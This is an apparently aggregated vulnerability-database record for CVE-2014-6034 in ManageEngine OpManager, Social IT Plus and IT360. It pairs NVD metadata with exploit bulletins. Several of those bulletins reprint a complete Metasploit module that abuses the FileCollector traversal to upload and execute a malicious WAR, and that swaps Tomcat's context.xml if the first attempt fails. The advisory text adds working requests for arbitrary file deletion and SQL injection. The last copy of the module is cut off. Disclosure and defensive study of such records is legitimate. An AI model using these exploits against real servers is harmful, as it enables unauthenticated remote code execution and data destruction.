ID CVE-2014-6034 Type cve Reporter NVD Modified 2014-12-05T08:45:42
Description
Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter.
{"reporter": "NVD", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "published": "2014-12-04T12:59:02", "cvelist": ["CVE-2014-6034"], "title": "CVE-2014-6034", "objectVersion": "1.2", "type": "cve", "hash": "8f1d166bac099cd2917795e38b82a65f20bc087a379f6cff1b1e3c1d9529974d", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6034", "bulletinFamily": "NVD", "id": "CVE-2014-6034", "history": [], "scanner": [], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "modified": "2014-12-05T08:45:42", "viewCount": 0, "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:10.0", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_opmanager:11.0"], "edition": 1, "description": "Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter.", "references": ["http://seclists.org/fulldisclosure/2014/Sep/110", "https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix", "https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt"], "lastseen": "2016-09-03T20:59:34", "assessment": {"system": "", "name": "", "href": ""}}
{"result": {"dsquare": [{"lastseen": "2017-09-26T15:33:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"], "enchantments_done": [], "references": ["https://vulners.com/OSVDB/OSVDB:112276"], "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet regionID parameter\n\nVulnerability Type: File Upload", "reporter": "Dsquare Security", "published": "2014-11-30T00:00:00", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "type": "dsquare", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "_object_type": "robots.models.dsquare.DsquareBulletin", "modified": "2014-11-30T00:00:00", "href": "", "id": "E-410", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-04T00:06:17", "osvdbidlist": ["112276"], "references": [], "description": "ManageEngine OpManager / Social IT Arbitrary File Upload. CVE-2014-6034. Remote exploit for java platform", "edition": 1, "reporter": "Pedro Ribeiro", "published": "2014-10-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "modified": "2014-10-02T00:00:00", "id": "EDB-ID:34867", "href": "https://www.exploit-db.com/exploits/34867/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\n The vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\n file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\n version 11.0 of SocialIT for Windows and Linux.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-6034' ],\r\n [ 'OSVDB', '112276' ],\r\n [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 27 2014'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptInt.new('SLEEP',\r\n [true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n 'method' => 'GET'\r\n })\r\n\r\n # A GET request on this servlet returns \"405 Method not allowed\"\r\n if res and res.code == 405\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n\r\n def upload_war_and_exec(try_again, app_base)\r\n tomcat_path = '../../../tomcat/'\r\n servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\n if try_again\r\n # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\r\n # The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments.\r\n # After replacing the context.xml file let's upload the WAR again.\r\n print_status(\"#{peer} - Replacing Tomcat context file\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(servlet_path),\r\n 'method' => 'POST',\r\n 'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},\r\n 'ctype' => 'application/xml',\r\n 'vars_get' => {\r\n 'regionID' => tomcat_path + \"conf\",\r\n 'FILENAME' => \"context.xml\"\r\n }\r\n })\r\n else\r\n # We need to create the upload directories before our first attempt to upload the WAR.\r\n print_status(\"#{peer} - Creating upload directories\")\r\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\n send_request_cgi({\r\n 'uri' => normalize_uri(servlet_path),\r\n 'method' => 'POST',\r\n 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\r\n 'ctype' => 'application/xml',\r\n 'vars_get' => {\r\n 'regionID' => \"\",\r\n 'FILENAME' => bogus_file\r\n }\r\n })\r\n register_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file)\r\n end\r\n\r\n war_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\n print_status(\"#{peer} - Uploading WAR file...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(servlet_path),\r\n 'method' => 'POST',\r\n 'data' => war_payload,\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'regionID' => tomcat_path + \"webapps\",\r\n 'FILENAME' => app_base + \".war\"\r\n }\r\n })\r\n\r\n # The server either returns a 500 error or a 200 OK when the upload is successful.\r\n if res and (res.code == 500 or res.code == 200)\r\n print_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n \" seconds for deployment\")\r\n sleep(datastore['SLEEP'])\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload, wait for session...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n 'method' => 'GET'\r\n })\r\n end\r\n\r\n\r\n def exploit\r\n app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n upload_war_and_exec(false, app_base)\r\n register_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\n sleep_counter = 0\r\n while not session_created?\r\n if sleep_counter == datastore['SLEEP']\r\n print_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\n upload_war_and_exec(true, app_base)\r\n return\r\n end\r\n\r\n sleep(1)\r\n sleep_counter += 1\r\n end\r\n end\r\nend", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/34867/"}, {"lastseen": "2018-01-25T18:52:52", "osvdbidlist": [], "references": [], "description": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities. CVE-2014-6034,CVE-2014-6035,CVE-2014-6036,CVE-2014-7866,CVE-2014-7868. Webapps ex...", "edition": 1, "reporter": "Exploit-DB", "published": "2014-11-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "href": "https://www.exploit-db.com/exploits/43896/", "id": "EDB-ID:43896", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n\r\nAffected versions: OpManager v? to v11.4\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n\r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43896/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:11", "references": [], "edition": 1, "description": "", "reporter": "Pedro Ribeiro", "published": "2014-09-29T00:00:00", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "type": "packetstorm", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "modified": "2014-09-29T00:00:00", "href": "https://packetstormsecurity.com/files/128477/ManageEngine-OpManager-Social-IT-Arbitrary-File-Upload.html", "id": "PACKETSTORM:128477", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. \nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated \nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on \nversion 11.0 of SocialIT for Windows and Linux. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6034' ], \n[ 'OSVDB', '112276' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] \n], \n'Privileged' => true, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 27 2014')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"), \n'method' => 'GET' \n}) \n \n# A GET request on this servlet returns \"405 Method not allowed\" \nif res and res.code == 405 \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef upload_war_and_exec(try_again, app_base) \ntomcat_path = '../../../tomcat/' \nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' \n \nif try_again \n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration \n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file. \n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments. \n# After replacing the context.xml file let's upload the WAR again. \nprint_status(\"#{peer} - Replacing Tomcat context file\") \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>}, \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => tomcat_path + \"conf\", \n'FILENAME' => \"context.xml\" \n} \n}) \nelse \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directories\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => rand_text_alphanumeric(4 + rand(32 - 4)), \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => \"\", \n'FILENAME' => bogus_file \n} \n}) \nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file) \nend \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => war_payload, \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'regionID' => tomcat_path + \"webapps\", \n'FILENAME' => app_base + \".war\" \n} \n}) \n \n# The server either returns a 500 error or a 200 OK when the upload is successful. \nif res and (res.code == 500 or res.code == 200) \nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s + \n\" seconds for deployment\") \nsleep(datastore['SLEEP']) \nelse \nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload, wait for session...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nupload_war_and_exec(false, app_base) \nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\") \n \nsleep_counter = 0 \nwhile not session_created? \nif sleep_counter == datastore['SLEEP'] \nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\") \nupload_war_and_exec(true, app_base) \nreturn \nend \n \nsleep(1) \nsleep_counter += 1 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128477/opmanager_socialit_file_upload.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:23:53", "references": [], "edition": 1, "description": "", "reporter": "Pedro Ribeiro", "published": "2014-09-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "id": "PACKETSTORM:128474", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-02T19:34:58", "references": [], "description": "Exploit for java platform in category remote exploits", "edition": 2, "reporter": "Pedro Ribeiro", "published": "2014-10-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "modified": "2014-10-01T00:00:00", "id": "1337DAY-ID-22712", "href": "https://0day.today/exploit/description/22712", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\nRank = ExcellentRanking\r\n\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Exploit::FileDropper\r\n\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',\r\n'Description' => %q{\r\nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\r\nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated\r\nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\r\nversion 11.0 of SocialIT for Windows and Linux.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6034' ],\r\n[ 'OSVDB', '112276' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt'\r\n],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]\r\n],\r\n'Privileged' => true,\r\n'Platform' => 'java',\r\n'Arch' => ARCH_JAVA,\r\n'Targets' =>\r\n[\r\n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]\r\n],\r\n'DefaultTarget' => 0,\r\n'DisclosureDate' => 'Sep 27 2014'))\r\n\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptInt.new('SLEEP',\r\n[true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n], self.class)\r\nend\r\n\r\ndef check\r\nres = send_request_cgi({\r\n'uri' =>\r\nnormalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"),\r\n'method' => 'GET'\r\n})\r\n\r\n# A GET request on this servlet returns \"405 Method not allowed\"\r\nif res and res.code == 405\r\nreturn Exploit::CheckCode::Detected\r\nend\r\n\r\nreturn Exploit::CheckCode::Safe\r\nend\r\n\r\n\r\ndef upload_war_and_exec(try_again, app_base)\r\ntomcat_path = '../../../tomcat/'\r\nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'\r\n\r\nif try_again\r\n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration\r\n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file.\r\n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML\r\ncomments.\r\n# After replacing the context.xml file let's upload the WAR again.\r\nprint_status(\"#{peer} - Replacing Tomcat context 